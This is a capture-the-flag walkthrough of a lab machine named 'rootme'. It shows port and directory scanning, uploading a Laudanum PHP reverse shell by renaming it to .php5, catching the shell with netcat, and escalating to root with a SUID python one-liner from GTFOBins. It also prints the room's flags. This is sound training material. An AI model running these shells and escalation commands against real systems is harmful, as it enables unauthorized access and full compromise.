>rootme

Task 1. Start the machine

Task 2. Reconnaissance

Question 1.

Scan the machine, how many ports are open? 

Scan the target

#nmap -A -p- 10.x.x.x

Found 2 ports open 22,80


Output

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))


Question 2.

What version of Apache is running?

From the nmap scan we can see that the Apache version is 2.4.29

Question 3.

What service is running on port 22? 

From the scan output we can see that the service running on port 22 is SSH

Answer 3. 

22

Question 4.  

Find directories on the web server using the GoBuster tool.

# gobuster -h 


Output

Usage:

  gobuster [command]

Available Commands:

  dir         Uses directory/file enumeration mode

  dns         Uses DNS subdomain enumeration mode

  fuzz        Uses fuzzing mode

  help        Help about any command

  s3          Uses aws bucket enumeration mode

  version     shows the current version

  vhost       Uses VHOST enumeration mode

Flags:

      –delay duration    Time each thread waits between requests (e.g. 1500ms)

  -h, –help              help for gobuster

      –no-error          Don’t display errors

  -z, –no-progress       Don’t display progress

  -o, –output string     Output file to write results to (defaults to stdout)

  -p, –pattern string    File containing replacement patterns

  -q, –quiet             Don’t print the banner and other noise

  -t, –threads int       Number of concurrent threads (default 10)

  -v, –verbose           Verbose output (errors)

  -w, –wordlist string   Path to the wordlist

We will use the following switches.

-w : path to wordlist 

-u : url

dir : directory bruteforce


# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt dir -u                                                         http://10.10.47.229 >2 /dev/null

Scan returned five directories 


Output

/uploads              (Status: 301) [Size: 314] [–> http://10.10.47.229/uploads/]

/css                  (Status: 301) [Size: 310] [–> http://10.10.47.229/css/]    

/js                   (Status: 301) [Size: 309] [–> http://10.10.47.229/js/]     

/panel                (Status: 301) [Size: 312] [–> http://10.10.47.229/panel/]  

/server-status        (Status: 403) [Size: 277]


Note 

Status code 301 :  The HTTP response status code 301 Moved Permanently is used for permanent redirecting, meaning current links or records using the URL this response is received for should be updated. 

Status code 403 :  The HTTP 403 Forbidden client error status response code indicates that the server understood the request but refuses to authorize it.

This status is similar to 401, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/403

 The >2 /dev/null at the end is used to redirect any errors that might occur during the scan 

Question 5.  

What is the hidden directory? 

Answer 5.

/panel/

Task 3. Getting a Shell

Question 1. 

Find a form to upload and get a reverse shell, and find the flag. 

Hint 

Search for “file upload bypass” and “PHP reverse shell”. 

Before searching on google what the Hint mentions, I tried using the php-reverse shell from Laundanum collection that comes with Kali Linux. It can be found in the following path 

/usr/share/laudanum/php/

We need to edit the php-reverse-shell.php file. 

#nano php-reverse-shell.php

Change the parameter $ip to your local machine ip and $port to any port that you know will not be blocked on your local machine.

Save and exit the document. 


Output

set_time_limit (0);

$VERSION = “1.0”;

$ip = ‘10.10.139.4’;  // CHANGE THIS

$port = 1234;       // CHANGE THIS

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = ‘uname -a; w; id; /bin/sh -i’;

$daemon = 0;

$debug = 0;


Upload the file

Unfortunately you are not allowed to upload php files on the website, so we are back to google. Turns out we can trick the upload mechanism by renaming our file from .php to .php5

After rename we can successfully upload the file. 

Getting the shell

Next we need to start netcat in order to get the reverse shell. We will use the following command and switches.

# nc -lvnp 1234 

-l  listen mode, for inbound connects

-n numeric-only IP addresses, no DNS

-v verbose 

-p local port number

Once we have nc setup it’s time to run the reverse shell script. 

We have successfully uploaded the shell to the sever so in order to execute it we need to navigate to the folder containing the uploaded file.

Going back to Gobuster’s output we found a directory named /uploads. Navigate to that directory. Sure enough the file is there. Click on the file and let’s have a look on netcat.


Output

# nc -vnlp 1234                                                                             

listening on [any] 1234 …

connect to [10.9.4.125] from (UNKNOWN) [10.10.139.4] 46402

Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

 13:14:58 up 27 min,  0 users,  load average: 0.07, 0.02, 0.06

USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

/bin/sh: 0: can’t access tty; job control turned off


We are in, now all that’s left is to locate the flag. The file containing it is  called user.txt

A simple find command gives us the location. 

$ find / -type f -name user.txt 2> /dev/null

/var/www/user.txt

$ cat /var/www/user.txt 

THM{y0u_g0t_a_sh3ll}

Note

Laudanum is a collection of injectable files, designed to be used in a pentest when upload vulnerabilities, administrative interfaces, and SQL injection flaws are found. These files are written in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.

Task 4. Privilege Escalation

 Now that we have a shell, let’s escalate our privileges to root. 

Question 1.  

Search for files with SUID permission, which file is weird? 

Note

SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner. 

If you create a script (owned by the root user) that needs the SUID bit set, you’d do so like: 

$sudo chmod u+s filename

To search for the files with SUID permission we can use the following command.


# find / -type f -user root -perm -4000 2>/dev/null 

perm search for files with the specified permissions

-type f search for files only (not directories)

2> /dev/null suppress errors

-user search for files owned by the specified user


Output

/usr/lib/dbus-1.0/dbus-daemon-launch-helper

/usr/lib/snapd/snap-confine

/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic

/usr/lib/eject/dmcrypt-get-device

/usr/lib/openssh/ssh-keysign

/usr/lib/policykit-1/polkit-agent-helper-1

/usr/bin/traceroute6.iputils

/usr/bin/newuidmap

/usr/bin/newgidmap

/usr/bin/chsh

/usr/bin/python


From the output we find an interesting file at /usr/bin/python

Question 2.

Find a form to escalate your privileges.

Hint

Search for gtfobins
https://gtfobins.github.io/gtfobins/python/

Navigate to the SUID section, omit the first command. 

Question 3.

root.txt

$ /usr/bin/python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’

After that, we are logged in as root, now let’s get the root.txt flag

# find -type f -name root.txt 2> /dev/null

# cat /root/root.txt


Output

THM{pr1v1l3g3_3sc4l4t10n}


Answer 3.

THM{pr1v1l3g3_3sc4l4t10n}